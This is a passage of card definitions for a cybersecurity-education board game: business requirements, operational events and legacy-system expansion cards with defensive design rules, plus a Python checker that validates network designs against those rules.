REQ-02: Customer Data Acquisition

Type: Growth / M&A
Requirement: The executive team is acquiring a customer-data company. Two million customer records must land somewhere safe by end of quarter.
Satisfied By: Database Server (10), OR database service hosted on a Cloud Workload (4) — cloud-hosting the crown jewels is a recorded risk
Score Impact: Missed: -10 points (deal falls through)


REQ-03: Work-From-Home Program

Type: Workforce
Requirement: HR is rolling out flexible work. Staff need secure remote access to internal systems.
Satisfied By: VPN Gateway (9)
Score Impact: Missed: -3 points (staff use risky workarounds; morale dips)


REQ-04: Remote Workforce Mandate

Type: Workforce
Requirement: The board mandates support for a fully remote workforce: secure access AND central identity for every remote login.
Satisfied By: VPN Gateway (9) AND Domain Controller (12)
Score Impact: Missed: -5 points (shadow IT spreads across home offices)


REQ-05: HIPAA Compliance Mandate

Type: Compliance
Requirement: A new healthcare client puts you in HIPAA scope. Regulators expect recoverable data and isolated sensitive systems.
Satisfied By: Backup Server (9) AND network segmentation (Network Segmentation Switch (10), or Segmented/Fully Isolated architecture)
Score Impact: Missed: -10 points (client walks; compliance exposure)


REQ-06: PCI Scope: Cardholder Data

Type: Compliance
Requirement: You now process card payments. Cardholder data must live on a database that is walled off from the rest of the network.
Satisfied By: Database Server (10) or cloud-hosted database, AND a Firewall (12) or Network Segmentation Switch (10) protecting it
Score Impact: Missed: -10 points (acquirer threatens to pull card processing)


REQ-07: 99.9% Uptime SLA

Type: Operations
Requirement: Your biggest customer signs a contract with a 99.9% uptime SLA on your public services. A single box is no longer good enough.
Satisfied By: Load Balancer (8), OR a second server duplicating any business-critical service (full price)
Score Impact: Missed: -5 points (SLA credits eat the margin)


REQ-08: M&A: Integrate Acquired Network

Type: Growth / M&A
Requirement: The company you just bought needs its two core services absorbed into your infrastructure this quarter.
Satisfied By: Two free capacity slots across your existing servers, OR deploy any new server this turn to host them (overloading is allowed at +1 Budget per extra service)
Score Impact: Missed: -10 points (integration stalls; synergies evaporate)


REQ-09: Scale Email System

Type: Operations
Requirement: Headcount doubled and the email system is groaning. Add headroom.
Satisfied By: Second Email Server (8), Load Balancer (8), OR email hosted on a Cloud Workload (4)
Score Impact: Missed: -5 points (mail delays; missed customer requests)


REQ-10: Security Audit Ordered

Type: Compliance
Requirement: The audit committee orders an independent security audit. Auditors expect centralized visibility of security events.
Satisfied By: SIEM (15), OR both IDS (10) and Email Gateway (6)
Score Impact: Missed: -5 points (qualified audit opinion)


REQ-11: Board Demands IR Readiness

Type: Security
Requirement: A competitor's breach is front-page news. The board demands demonstrable incident-detection capability.
Satisfied By: IDS (10), IPS (14), OR SIEM (15)
Score Impact: Missed: -10 points (board censure; CISO on thin ice)


REQ-12: Ransomware Wave in Sector

Type: Security
Requirement: A ransomware variant is tearing through your industry. You need recoverable backups AND a way to spot the attack.
Satisfied By: Backup Server (9) AND at least one of IDS (10) / IPS (14) / SIEM (15)
Score Impact: Missed: -20 points (you are one bad click from catastrophe)


REQ-13: New Subsidiary Office

Type: Growth
Requirement: A new regional office opens with no local infrastructure. Staff there must reach head-office systems securely.
Satisfied By: VPN Gateway (9)
Score Impact: Missed: -5 points (office runs on personal email and USB sticks)


REQ-14: E-Commerce Expansion

Type: Growth
Requirement: Sales moves online. You need a public web presence AND protection against the web attacks that come with taking payments.
Satisfied By: Web Server (7) or cloud-hosted web, AND WAF (11)
Score Impact: Missed: -5 points (checkout is either absent or a breach waiting to happen)


REQ-15: Developer Hiring Spree

Type: Workforce
Requirement: Engineering triples in size. Developers need somewhere to build and test that is not production.
Satisfied By: Development Server (5), OR dev services overloaded onto an existing server (+1 Budget per extra service — allowed)
Score Impact: Missed: -3 points (developers test in production; incidents follow)


REQ-16: Records-Retention Regulation

Type: Compliance
Requirement: New regulation requires seven-year retention of business records: durable shared storage plus a recoverable copy.
Satisfied By: File storage (File Server (6), or hosted on another server's capacity/overload) AND Backup Server (9)
Score Impact: Missed: -5 points (regulator issues a compliance notice)


REQ-17: Single Sign-On Rollout

Type: Operations
Requirement: Password chaos across a dozen apps. Leadership wants one identity for everything.
Satisfied By: Domain Controller (12)
Score Impact: Missed: -5 points (password reuse everywhere; helpdesk drowning)


REQ-18: Cyber-Insurance Renewal

Type: Security
Requirement: Your insurer's renewal questionnaire wants proof of backups, phishing defense, and detection.
Satisfied By: Backup Server (9) AND Email Gateway (6) AND at least one of IDS/IPS/SIEM
Score Impact: Met: +5 points (premium drops). Missed: -5 points (premium spikes)


REQ-19: Threat-Intel Pilot

Type: Security (Opportunity)
Requirement: Your ISAC offers to feature any member running deception technology in its quarterly report.
Satisfied By: Honeypot Decoy (7) or Honeypot Network (8)
Score Impact: Met: +5 points (industry kudos). Missed: 0 points (opportunity passes; no penalty)


REQ-20: Data-Center Consolidation

Type: Operations (Opportunity)
Requirement: Finance wants the server-room footprint shrunk. Show that at least one business service runs in the cloud.
Satisfied By: Any service hosted on a Cloud Workload (4)
Score Impact: Met: +3 points (opex savings). Missed: -3 points (facilities costs balloon)


Requirement Card Summary

| Card   | Requirement                 | Satisfied By                          | Missed | Met Bonus |
|--------|-----------------------------|---------------------------------------|--------|-----------|
| REQ-01 | Product Launch Website      | Web Server or cloud web               | -5     |           |
| REQ-02 | Customer Data Acquisition   | Database (dedicated or cloud)         | -10    |           |
| REQ-03 | Work-From-Home Program      | VPN Gateway                           | -3     |           |
| REQ-04 | Remote Workforce Mandate    | VPN Gateway + Domain Controller       | -5     |           |
| REQ-05 | HIPAA Compliance            | Backup + segmentation                 | -10    |           |
| REQ-06 | PCI Cardholder Data         | Database + Firewall/Segmentation      | -10    |           |
| REQ-07 | 99.9% Uptime SLA            | Load Balancer or duplicate server     | -5     |           |
| REQ-08 | M&A Network Integration     | 2 spare slots or new server           | -10    |           |
| REQ-09 | Scale Email System          | 2nd Email Server / LB / cloud email   | -5     |           |
| REQ-10 | Security Audit              | SIEM, or IDS + Email Gateway          | -5     |           |
| REQ-11 | IR Readiness                | IDS, IPS, or SIEM                     | -10    |           |
| REQ-12 | Ransomware Wave             | Backup + detection                    | -20    |           |
| REQ-13 | New Subsidiary Office       | VPN Gateway                           | -5     |           |
| REQ-14 | E-Commerce Expansion        | Web + WAF                             | -5     |           |
| REQ-15 | Developer Hiring Spree      | Dev Server or overload                | -3     |           |
| REQ-16 | Records Retention           | File storage + Backup                 | -5     |           |
| REQ-17 | Single Sign-On              | Domain Controller                     | -5     |           |
| REQ-18 | Cyber-Insurance Renewal     | Backup + Email Gateway + detection    | -5     | +5        |
| REQ-19 | Threat-Intel Pilot          | Honeypot                              | 0      | +5        |
| REQ-20 | Data-Center Consolidation   | Any cloud-hosted service              | -3     | +3        |

Gameplay Notes

Draw Rules

Design Tension

Requirements are deliberately lumpy: some are satisfied by things every sane design already has (web, database), others punish narrow builds (detection, deception, redundancy). Teams that spend everything in turn 1 have no reserve when REQ-12 lands.


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by type:
     - Green (Growth/M&A): REQ-01, REQ-02, REQ-08, REQ-13, REQ-14
     - Blue (Workforce/Operations): REQ-03, REQ-04, REQ-07, REQ-09, REQ-15, REQ-17, REQ-20
     - Orange (Compliance): REQ-05, REQ-06, REQ-10, REQ-16
     - Red (Security): REQ-11, REQ-12, REQ-18, REQ-19
  3. Cut along dotted lines
  4. Shuffle into a single face-down deck for play

Network Building Standalone: Business Requirement Cards
Part of Incident Zero, a modular cybersecurity board game
v2.2 - Playtest Edition

cards/network-building/standalone/operational-event-cards.md

Network Building Standalone: Operational Event Cards

Version: 2.2 - Playtest Edition
Last Updated: July 2026


Overview

Operational Event Cards are the random incidents, windfalls, and headaches of running infrastructure. One card is revealed each turn (Phase 2) of the Network Building standalone game, right after the Business Requirement.


Operational Event Cards

EVT-01: Email Server Failure

Type: Outage
Effect: Your email server dies mid-quarter. Choose one:
  - Repair: Pay 5 Budget (emergency callout)
  - Ignore: -10 points (email down all quarter; users furious)
Mitigated By: A second Email Server, or email hosted on a Cloud Workload — the redundant/cloud service carries the load: no cost, no penalty
No email service at all? Nothing to break — but you already have bigger problems (see Capability scoring)


EVT-02: Traffic Spike

Type: Load
Effect: Your product goes viral overnight. Public services are hammered.
  - Prepared (Load Balancer, CDN, or a duplicated web service): +5 points (you rode the wave; sales boom)
  - Unprepared: -5 points (site down during your biggest day)
Mitigated By: Load Balancer (8), CDN (expansion CLOUD-04), or redundant web hosting


EVT-03: Phishing Wave

Type: Attack
Effect: A targeted phishing campaign hits every inbox in the company.
  - Email Gateway deployed: +5 points (campaign filtered; nice catch)
  - No Email Gateway: -10 points (three credential sets stolen)
Mitigated By: Email Gateway (6)


EVT-04: Cloud Vendor Outage

Type: Outage
Effect: Your cloud provider has a region-wide outage this quarter.
  - If any required business service runs only in the cloud: -5 points (service dark; SLA breached)
  - Cloud services with an on-prem twin, or no cloud usage: no effect
Mitigated By: On-prem redundancy for cloud-hosted services, or an all-on-prem design
Lesson: Cloud is cheap, but concentration risk is real


EVT-05: Budget Cut

Type: Finance
Effect: Fiscal crisis. Lose 5 Budget immediately (to a minimum of 0).
Mitigated By: Nothing, but teams holding a contingency reserve absorb it without changing plans


EVT-06: Emergency Funds

Type: Finance
Effect: A surprise rebate lands. Gain +10 Budget (one time).
Mitigated By: N/A (enjoy it)


EVT-07: Security Grant

Type: Finance
Effect: A government cyber-resilience grant is available to organizations with recoverable backups.
  - Backup Server deployed: Gain +5 Budget
  - No Backup Server: Nothing (you don't qualify)
Mitigated By: N/A. This one rewards good hygiene.


EVT-08: File Server Filling Up

Type: Capacity
Effect: Shared storage hits 98% full. Choose one this turn:
  - Add capacity: Deploy any server to host file storage, or overload an existing server (+1 Budget per extra service)
  - Ignore: -5 points (service degradation; work grinds)
Mitigated By: Spare capacity anywhere in your design (assign file storage to it at no cost)
No file storage service at all? No effect, and no file-storage capability either.


EVT-09: Honeypot Triggers

Type: Attack (Detected?)
Effect: Someone has been quietly probing your network.
  - Honeypot Decoy or Honeypot Network deployed: +5 points (intruder caught red-handed in the decoy; access cut)
  - No honeypot: Nothing visible happens. Nothing visible ever happens. (No penalty, this time)
Mitigated By: N/A. This is deception's payday.


EVT-10: Insider Snooping

Type: Attack
Effect: An employee is browsing systems far outside their role.
  - SIEM deployed OR network segmentation in place: +5 points (caught early / blocked at the zone boundary)
  - Neither: -5 points (months of quiet data access before anyone notices)
Mitigated By: SIEM (15) or Network Segmentation Switch (10) / segmented architecture


EVT-11: Ransomware Strikes

Type: Attack (Severe)
Effect: Ransomware detonates on an internal system.
  - Backup Server deployed: Pay 3 Budget for restore effort; if you also have detection (IDS/IPS/SIEM), you contained it fast: +5 points
  - No Backup Server: -20 points (pay the ransom or lose the data; either way it's ugly)
Mitigated By: Backup Server (9); detection reduces blast radius


EVT-12: IT Staff Burnout

Type: Operations
Effect: The ops team is running on fumes. This turn you may deploy at most ONE component. (Handling the turn's Business Requirement with an already-deployed component is fine.)
Mitigated By: Designs that are already complete. Teams who front-loaded their build barely notice.


EVT-13: Vendor Promotion

Type: Opportunity
Effect: A security vendor is clearing stock. The next security device you deploy this turn costs 2 less (minimum cost 1).
Mitigated By: N/A. Pure opportunity; skip it if nothing on the list fits your design.


EVT-14: New Hire Needs Remote Access

Type: Workforce
Effect: A key new hire works from another city and starts Monday.
  - VPN Gateway deployed: No effect (onboarding is routine)
  - No VPN Gateway: -3 points (they quit in week two, or worse: they improvise)
Mitigated By: VPN Gateway (9)


EVT-15: Hardware Recall

Type: Outage
Effect: A vendor recalls a faulty component. Pick one of your on-prem servers (the Threat Orchestrator picks if you won't):
  - Pay 3 Budget for expedited replacement, OR
  - That server is offline this quarter; any requirement it alone satisfies counts as unmet this turn
Mitigated By: Redundant servers or cloud-hosted twins (the twin covers the outage: no cost, no penalty). All-cloud designs are unaffected.


EVT-16: Quiet Quarter

Type: Respite
Effect: Nothing breaks. Nobody attacks. Finance leaves you alone. Use the breathing room to review your gaps.
Mitigated By: N/A


Event Card Summary

| Card   | Event                  | Effect (Unmitigated)         | Mitigated By             |
|--------|------------------------|------------------------------|--------------------------|
| EVT-01 | Email Server Failure   | Pay 5 or -10 pts             | Redundant/cloud email    |
| EVT-02 | Traffic Spike          | -5 pts (or +5 if ready)      | LB / CDN / redundant web |
| EVT-03 | Phishing Wave          | -10 pts (or +5 if ready)     | Email Gateway            |
| EVT-04 | Cloud Vendor Outage    | -5 pts if cloud-only service | On-prem redundancy       |
| EVT-05 | Budget Cut             | -5 Budget                    | Contingency reserve      |
| EVT-06 | Emergency Funds        | +10 Budget                   | N/A                      |
| EVT-07 | Security Grant         | +5 Budget if Backup          | N/A                      |
| EVT-08 | File Server Filling Up | Buy capacity or -5 pts       | Spare capacity           |
| EVT-09 | Honeypot Triggers      | +5 pts if honeypot           | N/A                      |
| EVT-10 | Insider Snooping       | -5 pts (or +5 if ready)      | SIEM / segmentation      |
| EVT-11 | Ransomware Strikes     | -20 pts                      | Backup (+ detection: +5) |
| EVT-12 | IT Staff Burnout       | Max 1 deploy this turn       | Completed builds         |
| EVT-13 | Vendor Promotion       | Next device -2 cost          | N/A                      |
| EVT-14 | New Hire Remote Access | -3 pts                       | VPN Gateway              |
| EVT-15 | Hardware Recall        | Pay 3 or server offline      | Redundancy / cloud       |
| EVT-16 | Quiet Quarter          | Nothing                      | N/A                      |

Gameplay Notes

Draw Rules

Design Tension

Events reward the same things the scoring rewards (redundancy, detection, backups, and a contingency reserve), so mitigation is never wasted spend. The nastiest cards, EVT-11 above all, are exactly why zero-reserve builds and backup-free builds both hurt.


Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Color-code by type:
     - Red (Attack): EVT-03, EVT-09, EVT-10, EVT-11
     - Orange (Outage/Capacity): EVT-01, EVT-04, EVT-08, EVT-15
     - Blue (Finance/Operations): EVT-05, EVT-06, EVT-07, EVT-12
     - Green (Opportunity/Respite): EVT-02, EVT-13, EVT-14, EVT-16
  3. Cut along dotted lines
  4. Shuffle into a single face-down deck for play

Network Building Standalone: Operational Event Cards
Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

cards/network-building/expansion-deck/legacy-systems.md

Network Building Module: Legacy Systems (Expansion)

Version: 2.1 - Balanced & Refined Edition
Last Updated: October 2025


Overview

Legacy System Cards extend the Network Building module with specialized systems that many organizations still operate but cannot easily patch or upgrade.


Legacy System Cards

LEGACY-01: Mainframe System

Type: Legacy Business-Critical Infrastructure
Cost: 15 Budget (expensive to operate)
Complexity: 4/4 (extremely complex, specialized expertise required)
Availability Requirement: 99.95% (financial/mission-critical)
Supported Operating System: Mainframe OS (z/OS, VSE, VM), not patchable

Description: Large centralized mainframe computer running business-critical applications. Banks, insurance companies, government agencies, and utilities often depend on mainframes for core operations. Mainframes are designed for availability and stability, but their security model is outdated (it predates internet security concerns).

Key Characteristics:
  - Age: Often 20-30+ years old
  - Software: Custom applications written in COBOL or other legacy languages
  - Security: Perimeter security model (assumes all internal traffic is trusted)
  - Expertise: Few experts remain (knowledge is leaving the industry)
  - Vendor Support: Vendor may no longer exist; in-house expertise is critical
  - Cost of Replacement: $5M-$100M+ (replacement is effectively impossible)

Key Concerns:
  - No regular security patches available (vendor EOL)
  - Known CVEs published but cannot be patched
  - Legacy protocols (unencrypted connections, weak authentication)
  - Access control systems predate modern security standards
  - Directly connected to the corporate network (not isolated)
  - Often contains the entire organization's critical data
  - Business process depends on it (replacement would take years)

Defense Strategy (Cannot Fix, Must Isolate):
  - Network Isolation: Mainframe in a restricted segment with minimal connectivity
  - Firewall Rules: Only authorized systems can connect, and only to specific ports
  - Monitoring: SIEM must monitor all mainframe connections (detect anomalies)
  - Assumption of Breach: Assume the mainframe will be compromised; defend everything else
  - No Direct User Access: Users should not access the mainframe directly (access via a secure application tier)
  - Log Aggregation: All mainframe activity logged centrally (immutable audit trail)

Network Interactions:
  - Requires: Firewall rules isolating the mainframe
  - Requires: Network Segmentation to restrict access
  - Requires: SIEM monitoring for anomaly detection
  - Incompatible with: Direct internet access (perimeter firewall only)
  - Incompatible with: Cloud integration (data residency and connectivity issues)

Incident Response Impact:
  - If the mainframe is compromised, the entire organization may be compromised
  - Mainframe compromise may be an immediate game loss in Incident Response
  - Legacy authentication means an attacker can move freely once inside
  - The mainframe holds enough data to be the primary exfiltration target

Team Design Validation:
  - ✓ If including a mainframe: must include Network Segmentation + Firewall
  - ✓ Must include SIEM for monitoring
  - ✗ Failure: Direct user access to the mainframe increases risk
  - ✗ Failure: Cloud connectivity to the mainframe violates the security boundary


LEGACY-02: Custom Business Application

Type: Legacy Business-Critical Software
Cost: 8 Budget (application licensing/support)
Complexity: 3/4 (difficult to update or replace)
Availability Requirement: 99% (business depends on it)
Operating System: Windows Server 2008/2012, older Linux, or a proprietary OS

Description: Specialized business application written by an external vendor or in-house team and no longer maintained. The application may be:
  - An accounting system (custom financial software)
  - A manufacturing control system (production scheduling)
  - An insurance claims system
  - A legal case management system
  - An ERP (Enterprise Resource Planning) system

The application is mission-critical, but:
  - The vendor no longer provides updates (the company went out of business or dropped support)
  - Cost to replace: $500K-$5M+ (economically infeasible)
  - The business process is deeply embedded in the application (replacement would require major restructuring)
  - Knowledge of the application is scarce (original developers left, documentation is poor)

Key Characteristics:
  - Age: Often 10-20 years old
  - Language: Written in outdated languages (Visual Basic 6, old Java, COBOL)
  - Vendor: Vendor may no longer exist; purchased "as-is"
  - Customization: Heavily customized for the organization (not a standard product)
  - Expertise: Few people understand the code
  - Database: Proprietary or very old database (SQL Server 2005, Oracle 10g, etc.)
  - Integration: Deeply integrated into the business workflow

Key Concerns:
  - Application may contain hardcoded credentials
  - Application may store passwords in plaintext
  - Application may use unencrypted connections to the database
  - Application may have SQL injection vulnerabilities (pre-2005 development)
  - Application may lack audit logging
  - Upgrading the operating system may break the application
  - Operating system patches may be incompatible with the application
  - Security testing tools may break the application

Defense Strategy (Isolate and Monitor):
  - Application Server Isolation: Application in a restricted segment
  - Database Isolation: Application database encrypted and access-controlled
  - Network Firewall: Only users/systems that need the application can reach it
  - No Direct Internet Access: Application never exposed to the internet
  - SIEM Monitoring: All application access logged and monitored
  - Assumption: Assume the application has SQL injection or similar vulnerabilities; defend the database
  - Access Control: Limit who can use the application (risk vs. benefit analysis)

Network Interactions:
  - Requires: Application Server (SRV-06 or custom server)
  - Requires: Database Server isolated from other systems
  - Requires: Firewall rules limiting access
  - Requires: SIEM monitoring of application access
  - Incompatible with: Cloud hosting (licensing, data residency issues)

Incident Response Impact:
  - A custom application vulnerability could be exploited for lateral movement
  - Application database compromise exposes sensitive business data
  - Application logs may be missing or inaccessible
  - Attacker may extract application source code

Team Design Validation:
  - ✓ If including a custom application: must isolate application + database
  - ✓ Must limit user access (principle of least privilege)
  - ✓ Must monitor application access in SIEM
  - ✗ Failure: Direct internet access to the application increases attack surface
  - ✗ Failure: Weak access controls allow unauthorized application access


LEGACY-03: Industrial Control System (ICS)

Type: Operational Technology (OT) / Safety-Critical
Cost: 12 Budget (specialized equipment)
Complexity: 4/4 (extremely specialized, safety implications)
Availability Requirement: 99.9%+ (safety-critical, cannot fail)
Operating System: Proprietary industrial OS, real-time OS, or very old Linux

Description: Specialized system that controls physical machinery, manufacturing processes, power generation, utilities, or other critical infrastructure. Examples:
  - Manufacturing: Assembly line control, robotic systems
  - Utilities: Power distribution, water treatment, smart grid
  - Building Systems: HVAC, access control, fire systems
  - Transportation: Traffic signals, rail systems

Industrial Control Systems (ICS) are purpose-built for reliability and real-time control, not information security. They predate cybersecurity concerns.

Key Characteristics:
  - Purpose: Controls physical machinery or critical infrastructure
  - Real-time: Must respond in milliseconds (cannot tolerate latency)
  - Reliability: Designed for 99.99%+ availability
  - Security: Predates modern security (no authentication, no encryption)
  - Isolation: Historically air-gapped (not connected to the corporate network)
  - Expertise: Requires specialized engineering expertise (electrical, mechanical, control systems)
  - Cost of Downtime: $10K-$1M+ per minute of downtime
  - Lifecycle: 10-30 year lifespan (far longer than IT systems)

Key Concerns (from the IT Perspective):
  - Cannot be patched (real-time systems cannot tolerate OS updates)
  - Cannot tolerate intrusion detection (latency would affect operations)
  - Cannot install EDR/antivirus (would slow down real-time responses)
  - Cannot use modern encryption (adds latency)
  - Uses legacy protocols (Modbus, Profibus, DNP3) with no security built in
  - Often air-gapped historically, now being connected to the corporate network (exposes the vulnerability)
  - If compromised, physical safety implications (machinery malfunction, power outage, etc.)

Key Concerns (from the ICS Perspective):
  - Availability is paramount (security is secondary)
  - Adding security controls might affect uptime
  - ICS engineers are rarely trained in IT security
  - IT security tools and practices may break ICS
  - ICS changes must be tested extensively (downtime is unacceptable)

Defense Strategy (Strict Isolation):
  - Never Connect to the Corporate Network: ICS should remain air-gapped
  - If a Connection Is Required: Use a unidirectional gateway (ICS can send data out, nothing comes in)
  - Network Segmentation: ICS in a segment completely isolated from corporate systems
  - No User Internet Access from ICS: ICS workstations cannot browse the internet
  - Physical Security: ICS room locked, access restricted to authorized engineers
  - Monitoring: Use ICS-specific monitoring tools (not a traditional SIEM)
  - Assumption: Assume the ICS network will be compromised; focus on preventing spread to corporate

Network Interactions:
  - Isolation: Complete separation from the corporate network (air-gapped preferred)
  - If a Bridge Is Required: Unidirectional gateway (one-way data flow)
  - Incompatible with: Corporate firewall (ICS cannot tolerate intrusion detection latency)
  - Incompatible with: EDR/Antivirus (would slow down real-time control)
  - Incompatible with: Cloud integration (real-time latency requirements)

Incident Response Impact:
  - ICS compromise may cause physical safety issues (priority = physical safety over data)
  - ICS compromise may cause production shutdown (significant financial impact)
  - ICS security investigation requires specialized expertise (not standard IT)
  - ICS forensics may disrupt operations (evidence cannot be preserved if doing so affects safety)

Team Design Validation:
  - ✓ If including ICS: must isolate ICS from the corporate network
  - ✓ Must use a unidirectional gateway if connectivity is required
  - ✓ Must NOT install traditional IT security tools on ICS
  - ✗ Failure: Corporate network connected to ICS without isolation
  - ✗ Failure: ICS exposed to the internet or untrusted networks
  - ✗ Failure: IT security tools degrading ICS real-time performance


LEGACY-04: Obsolete Operating System

Type: Legacy Infrastructure Running an Unsupported OS
Cost: 5 Budget (cheap hardware, but difficult to support)
Complexity: 3/4 (difficult to manage with modern security tools)
Availability Requirement: 80-95% (business can tolerate occasional downtime)
Operating System Examples: Windows XP, Windows Server 2003, old Linux kernels, custom UNIX variants

Description: Systems running operating systems that are no longer supported by the vendor or open-source community. The vendor has stopped releasing security patches. Public exploit code for known vulnerabilities exists and is freely available.

Examples:
  - Windows XP (support ended 2014)
  - Windows Server 2003 (support ended 2015)
  - Linux 2.4/2.6 kernels (EOL for 10+ years)
  - Solaris 8/9 (Sun Microsystems EOL)
  - Other commercial UNIX variants EOL decades ago

Key Characteristics:
  - Support: No security patches from the vendor
  - Exploits: All known vulnerabilities are published and will never be fixed
  - Tools: Modern security tools often don't run on an EOL OS
  - Compatibility: Cannot run modern applications
  - Patching OS: An OS upgrade would break dependent applications
  - Cost of Replacement: Application replacement cost makes the OS upgrade prohibitive

Key Concerns:
  - All known vulnerabilities can be exploited (no patches)
  - Public exploits readily available (trivial for an attacker)
  - Modern malware often targets these systems (profitable attacks)
  - Ransomware frequently targets EOL systems (known vulnerabilities)
  - System cannot run modern antivirus/EDR (not compatible)
  - System cannot use modern encryption protocols
  - System is prone to exploitation for lateral movement into modern systems

Defense Strategy (Assume Compromise, Isolate):
  - Assumption: Assume the EOL system will be compromised (all vulnerabilities are public)
  - Network Isolation: EOL system in a restricted segment with minimal connectivity
  - Firewall Rules: Only necessary traffic to/from the EOL system
  - No Lateral Movement: Firewall rules prevent movement from the EOL system to others
  - No Sensitive Data: Do not store sensitive data on the EOL system
  - Monitoring: SIEM monitors the EOL system closely (detect signs of compromise)
  - Replacement Planning: Have a timeline to replace/upgrade the EOL system
  - Physical Security: Restrict physical access to the EOL system

Network Interactions:
  - Isolation: EOL system in an isolated segment
  - Firewall: Strict firewall rules (default deny)
  - Monitoring: SIEM alerts on any unusual EOL system activity
  - No Cloud Access: EOL system does not connect to cloud systems
  - Air-gapped Preferred: If possible, keep the EOL system air-gapped

Incident Response Impact:
  - EOL system compromise may be inevitable (all vulnerabilities public)
  - Attacker will target the EOL system as an entry point (easier than hardened systems)
  - EOL system may be used as a staging point for attacks on hardened systems
  - Forensics on the EOL system may be difficult (modern forensics tools do not support it)

Team Design Validation:
  - ✓ If including an EOL system: must isolate it completely
  - ✓ Must have a replacement timeline
  - ✓ Must NOT store sensitive data on the EOL system
  - ✗ Failure: No network isolation for the EOL system
  - ✗ Failure: Sensitive data on the EOL system
  - ✗ Failure: EOL system has the same network privileges as modern systems


Legacy Systems Card Summary

| Card      | System Type        | Cost | Complexity | Key Challenge                  |
|-----------|--------------------|------|------------|--------------------------------|
| LEGACY-01 | Mainframe          | 15   | 4/4        | Cannot patch, mission-critical |
| LEGACY-02 | Custom Application | 8    | 3/4        | Vendor no longer exists        |
| LEGACY-03 | Industrial Control | 12   | 4/4        | Real-time + safety-critical    |
| LEGACY-04 | Obsolete OS        | 5    | 3/4        | All vulnerabilities public     |

Design Philosophy

Key Principle: Cannot Fix, Must Isolate

Legacy systems cannot be fixed through normal security controls:
  - Cannot patch (vendor no longer supports it)
  - Cannot upgrade the OS (breaks dependent applications)
  - Cannot install modern security tools (incompatible)
  - Cannot redesign (cost prohibitive)

Instead, organizations must:
  1. Isolate the legacy system: Separate network segment, strict firewall rules
  2. Monitor closely: SIEM alerts on any anomalous activity
  3. Assume compromise: Design defenses assuming the legacy system will be compromised
  4. Plan replacement: Have a timeline to eventually replace the legacy system
  5. Limit exposure: Do not connect sensitive systems to the legacy system's network
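The "Team Design Validation" bullets of LEGACY-01 through LEGACY-04, turned into a small design checker a table can run over a build before the Threat Orchestrator does. This is an added example, not part of the game's files; the component kinds, field names and the sample build are assumptions made for it.

```python
"""Validator for the Legacy Systems cards (LEGACY-01 to LEGACY-04).
Constructed example, not part of the Incident Zero rules text: it turns each
card's "Team Design Validation" bullets into checks over a small network model.
Component kinds, field names and the sample design are assumptions."""
from dataclasses import dataclass, field

CARD = {"mainframe": "LEGACY-01", "custom_app": "LEGACY-02",
        "ics": "LEGACY-03", "eol_os": "LEGACY-04"}
IT_SECURITY_TOOLS = {"edr", "antivirus", "ids"}  # LEGACY-03: must not run on ICS

@dataclass
class Component:
    name: str
    kind: str                        # "mainframe", "firewall", "siem", "cloud", ...
    segment: str = "corporate"       # network segment the component sits in
    exposed_to: set = field(default_factory=set)  # e.g. "internet", "all_users"
    tools: set = field(default_factory=set)       # agents installed on the box
    sensitive_data: bool = False     # LEGACY-04: no sensitive data on EOL systems
    replacement_plan: bool = False   # LEGACY-04: a replacement timeline exists

@dataclass
class Link:
    src: str
    dst: str
    mode: str = "bidirectional"      # "unidirectional" = data flows src -> dst only

def validate(components, links):
    """Return [(card, failure), ...]; an empty list means the design passes."""
    by_name = {c.name: c for c in components}
    kinds = {c.kind for c in components}
    failures = []

    def links_of(name):  # yields (peer, mode, direction) for links touching name
        for ln in links:
            if ln.src == name:
                yield by_name[ln.dst], ln.mode, "out"
            elif ln.dst == name:
                yield by_name[ln.src], ln.mode, "in"

    for c in components:
        if c.kind not in CARD:
            continue
        card = CARD[c.kind]
        def fail(msg):
            failures.append((card, f"{c.name}: {msg}"))
        # Shared "Cannot Fix, Must Isolate" rule: own segment, never the corporate
        # LAN. LEGACY-02 may share its segment with its own database, nothing else.
        allowed = {"database"} if c.kind == "custom_app" else set()
        roommates = [o.name for o in components if o.name != c.name
                     and o.segment == c.segment and o.kind not in allowed]
        if c.segment == "corporate" or roommates:
            fail("not isolated in its own network segment")
        if "internet" in c.exposed_to:
            fail("directly exposed to the internet")
        if c.kind != "ics":  # ICS uses OT-specific monitoring instead of the SIEM
            if "siem" not in kinds:
                fail("no SIEM in the design to monitor the legacy system")
            if "firewall" not in kinds:
                fail("no firewall to enforce the isolation rules")
        if c.kind == "mainframe":
            if "segmentation" not in kinds:
                fail("mainframe requires Network Segmentation")
            if "all_users" in c.exposed_to:
                fail("direct user access (route users through a secure application tier)")
            if any(p.kind == "cloud" for p, _, _ in links_of(c.name)):
                fail("cloud connectivity violates the mainframe security boundary")
        elif c.kind == "custom_app":
            if "all_users" in c.exposed_to:
                fail("weak access controls: every user can reach the application")
        elif c.kind == "ics":
            for peer, mode, direction in links_of(c.name):
                if peer.segment == "corporate" and not (mode == "unidirectional" and direction == "out"):
                    fail(f"corporate system {peer.name} connected without a unidirectional gateway")
            for tool in sorted(c.tools & IT_SECURITY_TOOLS):
                fail(f"IT security tool '{tool}' installed on ICS (real-time impact)")
        elif c.kind == "eol_os":
            if c.sensitive_data:
                fail("sensitive data stored on an EOL system")
            if not c.replacement_plan:
                fail("no replacement timeline for the EOL system")
            for peer, mode, _ in links_of(c.name):
                if peer.segment == "corporate" and mode == "bidirectional":
                    fail(f"two-way link to {peer.name}: same network privileges as modern systems")
    return failures

# Constructed sample build: an isolated mainframe (passes), an ICS feeding a corporate
# historian through a data diode but running antivirus, and an XP box on the corporate LAN.
SAMPLE = [
    Component("fw", "firewall", "dmz"),
    Component("seg", "segmentation", "core"),
    Component("siem", "siem", "mgmt"),
    Component("historian", "database", "corporate"),
    Component("mf", "mainframe", "mainframe-zone"),
    Component("plc", "ics", "ot-zone", tools={"antivirus"}),
    Component("xp-box", "eol_os", "corporate", sensitive_data=True),
]
SAMPLE_LINKS = [Link("plc", "historian", "unidirectional"),  # OT -> corporate only
                Link("xp-box", "historian")]                  # two-way, same LAN

if __name__ == "__main__":
    print(*validate(SAMPLE, SAMPLE_LINKS), sep="\n")
```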


Gameplay Impact

Network Design Complexity

Including legacy systems significantly increases network design complexity:
  - Must add firewall rules for each legacy system
  - Must add network segmentation
  - Must add SIEM monitoring
  - Budget is constrained (legacy systems are expensive to operate)

Incident Response Complications

If Incident Response follows Network Building:
  - Legacy systems are easier attack targets (known vulnerabilities)
